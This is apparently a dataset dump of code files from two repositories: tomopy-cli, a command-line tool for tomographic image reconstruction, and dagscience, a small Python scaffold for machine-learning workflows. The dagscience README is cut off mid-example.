rotation_axis\n\ndef binning(proj, flat, dark, params):\n\n log.info(\" *** binning\")\n if(params.binning == 0):\n log.info(' *** *** OFF')\n else:\n log.warning(' *** *** ON')\n log.warning(' *** *** binning: %d' % params.binning)\n proj = _binning(proj, params)\n flat = _binning(flat, params)\n dark = _binning(dark, params)\n\n return proj, flat, dark\n\ndef _binning(data, params):\n\n data = tomopy.downsample(data, level=int(params.binning), axis=2) \n data = tomopy.downsample(data, level=int(params.binning), axis=1)\n\n return data\n\n\ndef flip_and_stitch(params, img360, flat360, dark360):\n\n center = int(params.rotation_axis_flip)\n img = np.zeros([img360.shape[0]//2,img360.shape[1],2*img360.shape[2]-2*center],dtype=img360.dtype)\n flat = np.zeros([flat360.shape[0],flat360.shape[1],2*flat360.shape[2]-2*center],dtype=img360.dtype)\n dark = np.zeros([dark360.shape[0],dark360.shape[1],2*dark360.shape[2]-2*center],dtype=img360.dtype)\n img[:,:,img360.shape[2]-2*center:] = img360[:img360.shape[0]//2,:,:]\n img[:,:,:img360.shape[2]] = img360[img360.shape[0]//2:,:,::-1]\n flat[:,:,flat360.shape[2]-2*center:] = flat360\n flat[:,:,:flat360.shape[2]] = flat360[:,:,::-1]\n dark[:,:,dark360.shape[2]-2*center:] = dark360\n dark[:,:,:dark360.shape[2]] = dark360[:,:,::-1]\n\n params.rotation_axis = img.shape[2]//2\n\n return img, flat, dark\n\n\ndef patch_projection(data, miss_angles):\n\n fdatanew = np.fft.fft(data,axis=2)\n\n w = int((miss_angles[1]-miss_angles[0]) * 0.3)\n\n fdatanew[miss_angles[0]:miss_angles[0]+w,:,:] = np.fft.fft(data[miss_angles[0]-1,:,:],axis=1)\n fdatanew[miss_angles[0]:miss_angles[0]+w,:,:] *= np.reshape(np.cos(np.pi/2*np.linspace(0,1,w)),[w,1,1])\n\n fdatanew[miss_angles[1]-w:miss_angles[1],:,:] = np.fft.fft(data[miss_angles[1]+1,:,:],axis=1)\n fdatanew[miss_angles[1]-w:miss_angles[1],:,:] *= np.reshape(np.sin(np.pi/2*np.linspace(0,1,w)),[w,1,1])\n\n fdatanew[miss_angles[0]+w:miss_angles[1]-w,:,:] = 0\n # lib.warning(\" *** %d, %d, %d \" % (datanew.shape[0], datanew.shape[1], datanew.shape[2]))\n\n lib.warning(\" *** patch_projection\")\n slider(np.log(np.abs(fdatanew.swapaxes(0,1))), axis=0)\n a = np.real(np.fft.ifft(fdatanew,axis=2))\n b = np.imag(np.fft.ifft(fdatanew,axis=2))\n # print(a.shape)\n slider(a.swapaxes(0,1), axis=0)\n slider(b.swapaxes(0,1), axis=0)\n return np.real(np.fft.ifft(fdatanew,axis=2))\n\n\ndef get_dx_dims(params):\n \"\"\"\n Read array size of a specific group of Data Exchange file.\n Parameters\n ----------\n fname : str\n String defining the path of file or file name.\n dataset : str\n Path to the dataset inside hdf5 file where data is located.\n Returns\n -------\n ndarray\n Data set size.\n \"\"\"\n\n dataset='data'\n\n grp = '/'.join(['exchange', dataset])\n\n with h5py.File(params.hdf_file, \"r\") as f:\n try:\n data = f[grp]\n except KeyError:\n return None\n\n shape = data.shape\n\n return shape\n\n\ndef file_base_name(fname):\n if '.' in fname:\n separator_index = fname.index('.')\n base_name = fname[:separator_index]\n return base_name\n else:\n return fname\n\ndef path_base_name(path):\n fname = os.path.basename(path)\n return file_base_name(fname)\n\n\ndef read_rot_centers(params):\n\n # Add a trailing slash if missing\n top = os.path.join(params.hdf_file, '')\n\n # Load the the rotation axis positions.\n jfname = top + \"rotation_axis.json\"\n \n try:\n with open(jfname) as json_file:\n json_string = json_file.read()\n dictionary = json.loads(json_string)\n\n return collections.OrderedDict(sorted(dictionary.items()))\n\n except Exception as error: \n log.error(\"ERROR: the json %s file containing the rotation axis locations is missing\" % jfname)\n log.error(\"ERROR: to create one run:\")\n log.error(\"ERROR: $ tomopy find_center --hdf-file %s\" % top)\n exit()\n" }, { "alpha_fraction": 0.632311999797821, "alphanum_fraction": 0.632311999797821, "avg_line_length": 24.571428298950195, "blob_id": "9a1317e3e988cbb21c5f488cc17298b3d8748bed", "content_id": "b21cf1bdecd7a0448690231e4a33c3c230061268", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 359, "license_type": "no_license", "max_line_length": 49, "num_lines": 14, "path": "/setup.py", "repo_name": "data-exchange/tomopy-cli-last-before-tomography", "src_encoding": "UTF-8", "text": "from setuptools import setup, find_packages\n\nsetup(\n name='tomopy-cli',\n version=open('VERSION').read().strip(),\n #version=__version__,\n author='Francesco De Carlo',\n author_email='[email protected]',\n url='https://github.com/decarlof/tomopy-cli',\n packages=find_packages(),\n scripts=['bin/tomopy'],\n description='cli for tomopy',\n zip_safe=False,\n)\n\n" }, { "alpha_fraction": 0.5430586934089661, "alphanum_fraction": 0.560330867767334, "avg_line_length": 47.15625, "blob_id": "9dfbe29bcb00979c2c1541ef82853965522db734", "content_id": "e1543c986f335408fcd921a9f0d719a6f638430e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 12334, "license_type": "no_license", "max_line_length": 235, "num_lines": 256, "path": "/README.rst", "repo_name": "data-exchange/tomopy-cli-last-before-tomography", "src_encoding": "UTF-8", "text": "==========\ntomopy-cli\n==========\n\n**tomopy** is commad-line-interface for `tomopy <https://github.com/tomopy/tomopy>`_ an open-source Python package for tomographic data processing and image reconstruction. \n\n\nInstallation\n============\n\n::\n\n $ python setup.py install\n\nin a prepared virtualenv or as root for system-wide installation.\n\n.. warning:: If your python installation is in a location different from #!/usr/bin/env python please edit the first line of the bin/tomopy file to match yours.\n\nDependencies\n============\n\nInstall the following package::\n\n $ conda install -c conda-forge tomopy\n\n\nUsage\n=====\n\nReconstruction\n--------------\n\nTo do a tomographic reconstruction::\n\n $ tomopy recon --hdf-file /local/data.h5\n\nfrom the command line. To get correct results, you may need to append\noptions such as `--rotation-axis` to set the rotation axis position::\n\n $ tomopy recon --rotation-axis 1024.0 --hdf-file /local/data.h5\n\nto list of all available options::\n\n $ tomopy recon -h\n\n\nConfiguration File\n------------------\n\nReconstruction parameters are stored in **tomopy.conf**. You can create a template with::\n\n $ tomopy init\n\n**tomopy.conf** is constantly updated to keep track of the last stored parameters, as initalized by **init** or modified by setting a new option value. For example to re-run the last reconstrusction with identical parameters just use::\n\n $ tomopy recon\n\nTo run a reconstruction with a different and previously stored configuration file **old_tomopy.conf** just use::\n\n $ tomopy recon --config old_tomopy.conf\n\n\nFind Center\n-----------\n\nTo automatically find the rotation axis location of all tomographic hdf data sets in a folder (/local/data/)::\n\n $ tomopy find_center --hdf-file /local/data/\n\n\nthis generates in the /local/data/ directory a **rotation_axis.json** file containing all the automatically calculated centers::\n\n {\"0\": {\"proj_0000.hdf\": 1287.25}, \"1\": {\"proj_0001.hdf\": 1297.75},\n {\"2\": {\"proj_0002.hdf\": 1287.25}, \"3\": {\"proj_0003.hdf\": 1297.75},\n {\"4\": {\"proj_0004.hdf\": 1287.25}, \"5\": {\"proj_0005.hdf\": 1297.75}}\n\nto list of all available options::\n\n $ tomopy find_center -h\n\n\nAfter using **find_center**, to do a tomographic reconstruction of all tomographic hdf data sets in a folder (/local/data/)::\n\n $ tomopy recon --hdf-file /local/data/\n\n\nHelp\n----\n\n::\n\n $ tomopy -h\n usage: tomopy [-h] [--config FILE] [--version] ...\n\n optional arguments:\n -h, --help show this help message and exit\n --config FILE File name of configuration file\n --version show program's version number and exit\n\n Commands:\n \n init Create configuration file\n recon Run tomographic reconstruction\n find_center Find rotation axis location for all hdf files in a directory\n\n::\n\n $ tomopy recon -h\n usage: tomopy recon [-h] [--center-search-width CENTER_SEARCH_WIDTH]\n [--binning {0,1,2,3}] [--blocked-views] [--dark-zero]\n [--hdf-file PATH]\n [--hdf-file-type {standard,flip_and_stich,mosaic}]\n [--nsino NSINO]\n [--nsino-per-chunk {2,4,8,16,32,64,128,256,512,1024,2048}]\n [--reverse] [--rotation-axis ROTATION_AXIS]\n [--rotation-axis-flip ROTATION_AXIS_FLIP]\n [--missing-angles-end MISSING_ANGLES_END]\n [--missing-angles-start MISSING_ANGLES_START]\n [--zinger-level-projections ZINGER_LEVEL_PROJECTIONS]\n [--zinger-level-white ZINGER_LEVEL_WHITE]\n [--zinger-removal-method {none,standard}]\n [--zinger-size ZINGER_SIZE] [--air AIR]\n [--fix-nan-and-inf]\n [--fix-nan-and-inf-value FIX_NAN_AND_INF_VALUE]\n [--flat-correction-method {standard,air,none}]\n [--minus-log]\n [--normalization-cutoff NORMALIZATION_CUTOFF]\n [--stripe-removal-method {none,fourier-wavelet,titarenko,smoothing-filter}]\n [--fourier-wavelet-filter {haar,db5,sym5,sym16}]\n [--fourier-wavelet-level FOURIER_WAVELET_LEVEL]\n [--fourier-wavelet-pad]\n [--fourier-wavelet-sigma FOURIER_WAVELET_SIGMA]\n [--titarenko-alpha TITARENKO_ALPHA]\n [--titarenko-nblock TITARENKO_NBLOCK]\n [--smoothing-filter-size SMOOTHING_FILTER_SIZE]\n [--alpha ALPHA] [--alpha-try] [--energy ENERGY] [--pad]\n [--phase-retrieval-method {none,paganin}]\n [--pixel-size PIXEL_SIZE]\n [--propagation-distance PROPAGATION_DISTANCE]\n [--filter {none,shepp,cosine,hann,hamming,ramlak,parzen,butterworth}]\n [--reconstruction-algorithm {art,astrasirt,astracgls,bart,fpb,gridrec,mlem,osem,ospml_hybrid,ospml_quad,pml_hybrid,pml_quad,sirt,tv,grad,tikh}]\n [--reconstruction-mask]\n [--reconstruction-mask-ratio RECONSTRUCTION_MASK_RATIO]\n [--reconstruction-type {try,slice,full}]\n [--iteration-count ITERATION_COUNT] [--config FILE]\n [--logs-home FILE] [--rotation-axis-file FILE] [--verbose]\n\n optional arguments:\n -h, --help show this help message and exit\n --center-search-width CENTER_SEARCH_WIDTH\n +/- center search width (pixel). Search is in 0.5\n pixel increments (default: 10.0)\n --binning {0,1,2,3} Reconstruction binning factor as power(2, choice)\n (default: 0)\n --blocked-views When set, the missing-angles options are used\n (default: False)\n --dark-zero When set, the the dark field is set to zero (default:\n False)\n --hdf-file PATH Name of the last used hdf file or directory containing\n multiple hdf files (default: .)\n --hdf-file-type {standard,flip_and_stich,mosaic}\n Input file type (default: standard)\n --nsino NSINO Location of the sinogram used for slice reconstruction\n and find axis (0 top, 1 bottom) (default: 0.5)\n --nsino-per-chunk {2,4,8,16,32,64,128,256,512,1024,2048}\n Number of sinagram per chunk. Use larger numbers with\n computers with larger memory (default: 32)\n --reverse When set, the data set was collected in reverse\n (180-0) (default: False)\n --rotation-axis ROTATION_AXIS\n Location of rotation axis (default: 1224.0)\n --rotation-axis-flip ROTATION_AXIS_FLIP\n Location of rotation axis in a 0-360 flip and stich\n data collection (default: 1224.0)\n --missing-angles-end MISSING_ANGLES_END\n Projection number of the first blocked view (default:\n 1)\n --missing-angles-start MISSING_ANGLES_START\n Projection number of the first blocked view (default:\n 0)\n --zinger-level-projections ZINGER_LEVEL_PROJECTIONS\n Expected difference value between outlier value and\n the median value of the array (default: 800.0)\n --zinger-level-white ZINGER_LEVEL_WHITE\n Expected difference value between outlier value and\n the median value of the array (default: 1000.0)\n --zinger-removal-method {none,standard}\n Zinger removal correction method (default: none)\n --zinger-size ZINGER_SIZE\n Size of the median filter (default: 3)\n --air AIR Number of pixels at each boundary to calculate the\n scaling factor (default: 10)\n --fix-nan-and-inf Fix nan and inf (default: False)\n --fix-nan-and-inf-value FIX_NAN_AND_INF_VALUE\n Values to be replaced with negative values in array\n (default: 0.0)\n --flat-correction-method {standard,air,none}\n Flat correction method (default: standard)\n --minus-log Minus log (default: False)\n --normalization-cutoff NORMALIZATION_CUTOFF\n Permitted maximum vaue for the normalized data\n (default: 1.0)\n --stripe-removal-method {none,fourier-wavelet,titarenko,smoothing-filter}\n Stripe removal method (default: none)\n --fourier-wavelet-filter {haar,db5,sym5,sym16}\n Type of the fourier-wavelet filter (default: sym16)\n --fourier-wavelet-level FOURIER_WAVELET_LEVEL\n Level parameter used by the fourier-wavelet method\n (default: 7)\n --fourier-wavelet-pad\n When set, extend the size of the sinogram by padding\n with zeros (default: False)\n --fourier-wavelet-sigma FOURIER_WAVELET_SIGMA\n Damping parameter in Fourier space (default: 1)\n --titarenko-alpha TITARENKO_ALPHA\n Damping factor (default: 1.5)\n --titarenko-nblock TITARENKO_NBLOCK\n Number of blocks (default: 0)\n --smoothing-filter-size SMOOTHING_FILTER_SIZE\n Size of the smoothing filter. (default: 5)\n --alpha ALPHA Regularization parameter (default: 0.001)\n --alpha-try When set, multiple reconstruction of the same slice\n with different alpha coefficient are generated\n (default: False)\n --energy ENERGY X-ray energy [keV] (default: 20)\n --pad When set, extend the size of the sinogram by padding\n with zeros (default: False)\n --phase-retrieval-method {none,paganin}\n Phase retrieval correction method (default: none)\n --pixel-size PIXEL_SIZE\n Pixel size [microns] (default: 1.17)\n --propagation-distance PROPAGATION_DISTANCE\n Sample detector distance [mm] (default: 60)\n --filter {none,shepp,cosine,hann,hamming,ramlak,parzen,butterworth}\n Reconstruction filter (default: parzen)\n --reconstruction-algorithm {art,astrasirt,astracgls,bart,fpb,gridrec,mlem,osem,ospml_hybrid,ospml_quad,pml_hybrid,pml_quad,sirt,tv,grad,tikh}\n Reconstruction algorithm (default: gridrec)\n --reconstruction-mask\n When set, applies circular mask to the reconstructed\n slices (default: False)\n --reconstruction-mask-ratio RECONSTRUCTION_MASK_RATIO\n Ratio of the mask’s diameter in pixels to the smallest\n edge size along given axis (default: 1.0)\n --reconstruction-type {try,slice,full}\n Reconstruct slice or full data set. For option (try):\n multiple reconstruction of the same slice with\n different (rotation axis) are generated (default: try)\n --iteration-count ITERATION_COUNT\n Maximum number of iterations (default: 10)\n --config FILE File name of configuration file (default:\n /Users/decarlo/tomopy.conf)\n --logs-home FILE Log file directory (default: /Users/decarlo/logs)\n --rotation-axis-file FILE\n File name of rataion axis locations (default:\n rotation_axis.json)\n --verbose Verbose output (default: False) \n" }, { "alpha_fraction": 0.576031506061554, "alphanum_fraction": 0.5878534913063049, "avg_line_length": 40.47595977783203, "blob_id": "721ccbb944b09db513cbb58df98793083a58a3d0", "content_id": "434477091e72832f069372cc6dd7734091c606cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8628, "license_type": "no_license", "max_line_length": 173, "num_lines": 208, "path": "/tomopy_cli/recon.py", "repo_name": "data-exchange/tomopy-cli-last-before-tomography", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport shutil\nimport pathlib\nimport numpy as np\nimport tomopy\nimport dxchange\n\nfrom tomopy_cli import log\nfrom tomopy_cli import file_io\nfrom tomopy_cli import prep\n\n\ndef rec(params):\n \n data_shape = file_io.get_dx_dims(params)\n\n if params.rotation_axis < 0:\n params.rotation_axis = data_shape[2]/2\n\n # Select sinogram range to reconstruct\n if (params.reconstruction_type == \"full\"):\n nSino_per_chunk = params.nsino_per_chunk\n chunks = int(np.ceil(data_shape[1]/nSino_per_chunk)) \n sino_start = 0\n sino_end = chunks*nSino_per_chunk\n\n else: # \"slice\" and \"try\" \n nSino_per_chunk = pow(2, int(params.binning))\n chunks = 1\n ssino = int(data_shape[1] * params.nsino)\n sino_start = ssino\n sino_end = sino_start + pow(2, int(params.binning)) \n\n\n log.info(\"reconstructing [%d] slices from slice [%d] to [%d] in [%d] chunks of [%d] slices each\" % \\\n ((sino_end - sino_start)/pow(2, int(params.binning)), sino_start/pow(2, int(params.binning)), sino_end/pow(2, int(params.binning)), \\\n chunks, nSino_per_chunk/pow(2, int(params.binning)))) \n\n strt = 0\n for iChunk in range(0, chunks):\n log.info('chunk # %i/%i' % (iChunk, chunks))\n sino_chunk_start = np.int(sino_start + nSino_per_chunk*iChunk)\n sino_chunk_end = np.int(sino_start + nSino_per_chunk*(iChunk+1))\n log.info(' *** [%i, %i]' % (sino_chunk_start/pow(2, int(params.binning)), sino_chunk_end/pow(2, int(params.binning))))\n \n if sino_chunk_end > sino_end: \n break\n\n sino = (int(sino_chunk_start), int(sino_chunk_end))\n\n # Read APS 32-BM raw data.\n proj, flat, dark, theta, rotation_axis = file_io.read_tomo(sino, params)\n\n # apply all preprocessing functions\n data = prep.all(proj, flat, dark, params)\n\n # Reconstruct\n if (params.reconstruction_type == \"try\"):\n # try passes an array of rotation centers and this is only supported by gridrec\n reconstruction_algorithm_org = params.reconstruction_algorithm\n params.reconstruction_algorithm = 'gridrec'\n\n center_search_width = params.center_search_width/np.power(2, float(params.binning))\n center_range = (rotation_axis-center_search_width, rotation_axis+center_search_width, 0.5)\n stack = np.empty((len(np.arange(*center_range)), data_shape[0], int(data_shape[2]/ np.power(2, float(params.binning)))))\n index = 0\n for axis in np.arange(*center_range):\n stack[index] = data[:, 0, :]\n index = index + 1\n log.warning(' reconstruct slice [%d] with rotation axis range [%.2f - %.2f] in [%.2f] pixel steps' % (ssino, center_range[0], center_range[1], center_range[2]))\n\n rotation_axis = np.arange(*center_range)\n rec = padded_rec(stack, theta, rotation_axis, params)\n\n # Save images to a temporary folder.\n fname = os.path.dirname(params.hdf_file) + '_rec' + os.sep + 'try_center' + os.sep + file_io.path_base_name(params.hdf_file) + os.sep + 'recon_'\n index = 0\n for axis in np.arange(*center_range):\n rfname = fname + str('{0:.2f}'.format(axis*np.power(2, float(params.binning))) + '.tiff')\n dxchange.write_tiff(rec[index], fname=rfname, overwrite=True)\n index = index + 1\n\n # restore original method\n params.reconstruction_algorithm = reconstruction_algorithm_org\n\n else: # \"slice\" and \"full\"\n rec = padded_rec(data, theta, rotation_axis, params)\n\n # handling of the last chunk \n if (params.reconstruction_type == \"full\"):\n if(iChunk == chunks-1):\n log.info(\"handling of the last chunk\")\n log.info(\" *** chunk # %d\" % (chunks))\n log.info(\" *** last rec size %d\" % ((data_shape[1]-(chunks-1)*nSino_per_chunk)/pow(2, int(params.binning))))\n rec = rec[0:data_shape[1]-(chunks-1)*nSino_per_chunk,:,:]\n\n # Save images\n if (params.reconstruction_type == \"full\"):\n tail = os.sep + os.path.splitext(os.path.basename(params.hdf_file))[0]+ '_rec' + os.sep \n fname = os.path.dirname(params.hdf_file) + '_rec' + tail + 'recon'\n dxchange.write_tiff_stack(rec, fname=fname, start=strt)\n strt += int((sino[1] - sino[0]) / np.power(2, float(params.binning)))\n if (params.reconstruction_type == \"slice\"):\n fname = os.path.dirname(params.hdf_file) + os.sep + 'slice_rec/recon_' + os.path.splitext(os.path.basename(params.hdf_file))[0]\n dxchange.write_tiff_stack(rec, fname=fname, overwrite=False)\n\n\n log.info(\" *** reconstructions: %s\" % fname)\n\n \n\ndef padded_rec(data, theta, rotation_axis, params):\n\n # original shape\n N = data.shape[2]\n # padding\n data, padded_rotation_axis = padding(data, rotation_axis, params) \n # reconstruct object\n rec = reconstruct(data, theta, padded_rotation_axis, params)\n # un-padding - restore shape \n rec = unpadding(rec, N, params)\n # mask each reconstructed slice with a circle\n rec = mask(rec, params)\n\n return rec\n\n\ndef padding(data, rotation_axis, params):\n\n log.info(\" *** padding\")\n\n if(params.padding):\n log.info(' *** *** ON')\n N = data.shape[2]\n data_pad = np.zeros([data.shape[0],data.shape[1],3*N//2],dtype = \"float32\")\n data_pad[:,:,N//4:5*N//4] = data\n data_pad[:,:,0:N//4] = np.reshape(data[:,:,0],[data.shape[0],data.shape[1],1])\n data_pad[:,:,5*N//4:] = np.reshape(data[:,:,-1],[data.shape[0],data.shape[1],1])\n\n data = data_pad\n rot_center = rotation_axis + N//4\n else:\n log.warning(' *** *** OFF')\n data = data\n rot_center = rotation_axis\n\n return data, rot_center\n\n\ndef unpadding(rec, N, params):\n\n log.info(\" *** un-padding\")\n if(params.padding):\n log.info(' *** *** ON')\n rec = rec[:,N//4:5*N//4,N//4:5*N//4]\n else:\n log.warning(' *** *** OFF')\n rec = rec\n return rec\n\n\ndef reconstruct(data, theta, rot_center, params):\n\n if(params.reconstruction_type == \"try\"):\n sinogram_order = True\n else:\n sinogram_order = False\n \n log.info(\" *** algorithm: %s\" % params.reconstruction_algorithm)\n if params.reconstruction_algorithm == 'astrasirt':\n extra_options ={'MinConstraint':0}\n options = {'proj_type':'cuda', 'method':'SIRT_CUDA', 'num_iter':200, 'extra_options':extra_options}\n shift = (int((data.shape[2]/2 - rot_center)+.5))\n data = np.roll(data, shift, axis=2)\n rec = tomopy.recon(data, theta, algorithm=tomopy.astra, options=options)\n elif params.reconstruction_algorithm == 'astracgls':\n extra_options ={'MinConstraint':0}\n options = {'proj_type':'cuda', 'method':'CGLS_CUDA', 'num_iter':15, 'extra_options':extra_options}\n shift = (int((data.shape[2]/2 - rot_center)+.5))\n data = np.roll(data, shift, axis=2)\n rec = tomopy.recon(data, theta, algorithm=tomopy.astra, options=options)\n elif params.reconstruction_algorithm == 'gridrec':\n log.warning(\" *** *** sinogram_order: %s\" % sinogram_order)\n rec = tomopy.recon(data, theta, center=rot_center, sinogram_order=sinogram_order, algorithm=params.reconstruction_algorithm, filter_name=params.filter)\n else:\n log.warning(\" *** *** algorithm: %s is not supported yet\" % params.reconstruction_algorithm)\n params.reconstruction_algorithm = 'gridrec'\n log.warning(\" *** *** using: %s instead\" % params.reconstruction_algorithm)\n log.warning(\" *** *** sinogram_order: %s\" % sinogram_order)\n rec = tomopy.recon(data, theta, center=rot_center, sinogram_order=sinogram_order, algorithm=params.reconstruction_algorithm, filter_name=params.filter)\n\n return rec\n\n\ndef mask(data, params):\n\n log.info(\" *** mask\")\n if(params.reconstruction_mask):\n log.info(' *** *** ON')\n if 0 < params.reconstruction_mask_ratio <= 1:\n log.warning(\" *** mask ratio: %f \" % params.reconstruction_mask_ratio)\n data = tomopy.circ_mask(data, axis=0, ratio=params.reconstruction_mask_ratio)\n else:\n log.error(\" *** mask ratio must be between 0-1: %f is ignored\" % params.reconstruction_mask_ratio)\n else:\n log.warning(' *** *** OFF')\n return data\n\n" } ]
5
ClaudioDavi/dagscience
https://github.com/ClaudioDavi/dagscience
fe09ec25d0d3ae2ef8f77dbc92e965c01bed1f45
6305c38b64c5520a00f1f2d2be255ccc7c9fed6a
394aed21c309761b01f869060d4ab7ade0f0d0fb
refs/heads/master
2020-04-27T14:11:42.309236
2019-03-10T22:23:38
2019-03-10T22:23:38
174,400,870
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.6555023789405823, "alphanum_fraction": 0.6555023789405823, "avg_line_length": 28.85714340209961, "blob_id": "8534b8f5e4da4d381c67b06a6a7a56e037e204d9", "content_id": "294c0931522149faf8db5747a7bf042bfdf8ff92", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 627, "license_type": "permissive", "max_line_length": 80, "num_lines": 21, "path": "/tests/test_steps.py", "repo_name": "ClaudioDavi/dagscience", "src_encoding": "UTF-8", "text": "from dagscience.step_manager import Step\nfrom .mock_workflow import MockGetData, MockPreprocess, MockTrain, MockSaveModel\nimport os\nimport configparser\n\n\nclass TestStep():\n step = Step(MockGetData(), MockPreprocess(),\n MockTrain(), MockSaveModel())\n\n def test_step_writer(self):\n self.step.step_writer()\n assert os.path.exists('.steps')\n os.remove('.steps')\n\n def test_step_writer_sections(self):\n self.step.step_writer()\n sections = configparser.ConfigParser()\n sections.read('.steps')\n assert 'STEPS' in sections.sections()\n os.remove('.steps')\n" }, { "alpha_fraction": 0.5995671153068542, "alphanum_fraction": 0.6020021438598633, "avg_line_length": 25.028169631958008, "blob_id": "c088c1d51d75c9f714796f4c7edafa4f1ad4044b", "content_id": "0fcf08d1230a85cebdf1c5717ada117862ba4265", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3696, "license_type": "permissive", "max_line_length": 90, "num_lines": 142, "path": "/dagscience/workflow.py", "repo_name": "ClaudioDavi/dagscience", "src_encoding": "UTF-8", "text": "from abc import ABC, abstractmethod\nimport logging\nfrom .step_manager import Step\n\n\nclass DagflowCycle:\n \"\"\"\n Every cicle on a DAG workflow begins with run.\n To implement a workflow you should build all the\n Tasks classes according to your needs and then pass\n them as parameters to the DagFlowCicle Object.\n After that, the workflow will take care of the process\n \"\"\"\n\n logger = logging.getLogger(__name__)\n\n def __init__(self, task_get_data, task_preprocess, task_train, task_model_saver):\n \"\"\"\n Creates workflow.\n\n params:\n\n task_get_data -- Implementation of the TaskGetData class\n\n task_preprocess -- Implementation of the TaskPreprocess class\n\n task_train -- Implementation of the TaskTrain class\n\n task_model_saver -- Implementation of the TaskSaveModel class\n\n returns:\n\n The workflow Cycle\n \"\"\"\n if (\n issubclass(task_get_data.__class__, TaskGetData)\n and issubclass(task_preprocess.__class__, TaskPreprocess)\n and issubclass(task_train.__class__, TaskTrain)\n and issubclass(task_model_saver.__class__, TaskSaveModel)\n ):\n self.step = Step(task_get_data, task_preprocess, task_train, task_model_saver)\n\n def run(self, step_1=True, step_2=True, step_3=True):\n \"\"\"\n Runs the workflow cycle you can disable steps as a parameter.\n Will return the Machine Learning Model\n\n params:\n\n step_1 -- Default(True) Enables Loading the data from external sources. \n If false will load from disk, or as defined in load_from_filesystem\n\n step_2 -- Default(True) Enables the preprocessing of the data. \n If false will return the original data.\n\n step_3 -- Default(True) Enables the creation and training of the model. \n If false will only load model from file system\n\n returns:\n Machine learning model.\n \"\"\"\n return self.step.execute_steps(step_1, step_2, step_3)\n\n def describe(self):\n pass\n\n\nclass TaskGetData(ABC):\n \"\"\"Abstract class to load data from the specified sources\"\"\"\n\n def __init__(self):\n pass\n\n @abstractmethod\n def load_from_source(self, *args, **kwargs):\n \"\"\"\n Loads data from the source\n \"\"\"\n\n @abstractmethod\n def load_from_filesystem(self, *args, **kwargs):\n \"\"\"\n Loads data from filesystem\n \"\"\"\n\n @abstractmethod\n def save(self, data, *args, **kwargs):\n \"\"\"\n Saves data to the repository\n \"\"\"\n\n\nclass TaskPreprocess(ABC):\n \"\"\"Abstract class to preprocess the data\"\"\"\n\n def __init__(self, *args, **kwargs):\n pass\n\n @abstractmethod\n def run(self, data, *args, **kwargs):\n \"\"\"\n Does Preprocessing on the data, returns dataframe\n \"\"\"\n\n\nclass TaskTrain(ABC):\n \"\"\" Abstract class to train and build the machine learning model\"\"\"\n\n def __init__(self):\n pass\n\n @abstractmethod\n def build_model(self):\n \"\"\"\n builds your machine learning algorithm.\n Use this for hiperparemeter tuning and not bloat the run method\n \"\"\"\n\n @abstractmethod\n def run(self, model, data):\n \"\"\"\n Runs the training job\n \"\"\"\n\n\nclass TaskSaveModel(ABC):\n \"\"\"Abstract class to save the machine learning model\"\"\"\n\n def __init__(self):\n pass\n\n @abstractmethod\n def save(self, model):\n \"\"\"\n Saves the model to the destination output\n \"\"\"\n\n @abstractmethod\n def load(self):\n \"\"\"\n Loads the model from target destination\n \"\"\"\n" }, { "alpha_fraction": 0.5826558470726013, "alphanum_fraction": 0.5826558470726013, "avg_line_length": 15.399999618530273, "blob_id": "b7caa786e66029fb32134bde4a2cff29033e13ef", "content_id": "c6dbf836bedaf3e43f4fd08c630d0b5cf7c4004b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 738, "license_type": "permissive", "max_line_length": 52, "num_lines": 45, "path": "/tests/mock_workflow.py", "repo_name": "ClaudioDavi/dagscience", "src_encoding": "UTF-8", "text": "from dagscience import workflow\n\n\nclass MockGetData(workflow.TaskGetData):\n def __init__(self):\n pass\n\n def load_from_source(self, *args, **kwargs):\n pass\n\n def load_from_filesystem(self, *args, **kwargs):\n pass\n\n def save(self, data, *args, **kwargs):\n pass\n\n\nclass MockPreprocess(workflow.TaskPreprocess):\n def __init(self):\n pass\n\n def run(self):\n pass\n\n\nclass MockTrain(workflow.TaskTrain):\n def __init__(self):\n pass\n\n def build_model(self):\n pass\n\n def run(self, model, data):\n pass\n\n\nclass MockSaveModel(workflow.TaskSaveModel):\n def __init__(self):\n pass\n\n def save(self, model):\n pass\n\n def load(self):\n pass\n" }, { "alpha_fraction": 0.6627042889595032, "alphanum_fraction": 0.6802377700805664, "avg_line_length": 30.457944869995117, "blob_id": "5371343733dc63352f187d675f15d0eb221254e7", "content_id": "f9f7316a359e127006c8b4d1e2e38e19d6da019c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3365, "license_type": "permissive", "max_line_length": 262, "num_lines": 107, "path": "/README.md", "repo_name": "ClaudioDavi/dagscience", "src_encoding": "UTF-8", "text": "# DAGSCIENCE\n#### Machine Learning Engineering Workflow Simplified\n\nWhen building machine learning workflows I always end up using the same scaffolding for my projects. The data has always some flow that it has to go through before turning into a usable Machine Learning Model.\n\nThis soon-to-be package comes to help those in need of a new structure for their engineering workflows.\n\nA Directed Acyclic Graph is a finite graph with no cycles in which data flows in only one direction. If you squint really hard, you can see that most model building in machine learning workflows follow the same rules, data-in/model-out with a lot of in-betweens.\n\nThis is a non-opinionated and non-invasive package that relies on pure python to work. I have set as a ground rule so that I can use it in my serverless functions where I always have to optimize for package size.\n\nTo use the package for now, you must clone it inside your repository and run: \n`pip install .`\n\nFrom there is up to you. Here's an example to help you out:\n\n```python\nimport os\nimport warnings\n\nimport pandas as pd\nfrom sklearn.ensemble import GradientBoostingRegressor\nimport sklearn\nfrom sklearn.exceptions import DataConversionWarning\n\n\nfrom dagscience import workflow\nimport joblib\n \nwarnings.filterwarnings(action='ignore', category=DataConversionWarning)\n\n\nclass TaskGetDataConcrete(workflow.TaskGetData):\n def __init__(self):\n pass\n\n def save(self, data, *args, **kwargs):\n data.to_csv(\"data.csv\", index=False)\n return data\n\n def load_from_source(self):\n # Loads literacy rate dataset\n data = pd.read_csv(\"https://query.data.world/s/ohtb5dg6ik6pr7vvylm2yqtwaf5aqs\")\n return self.save(data)\n 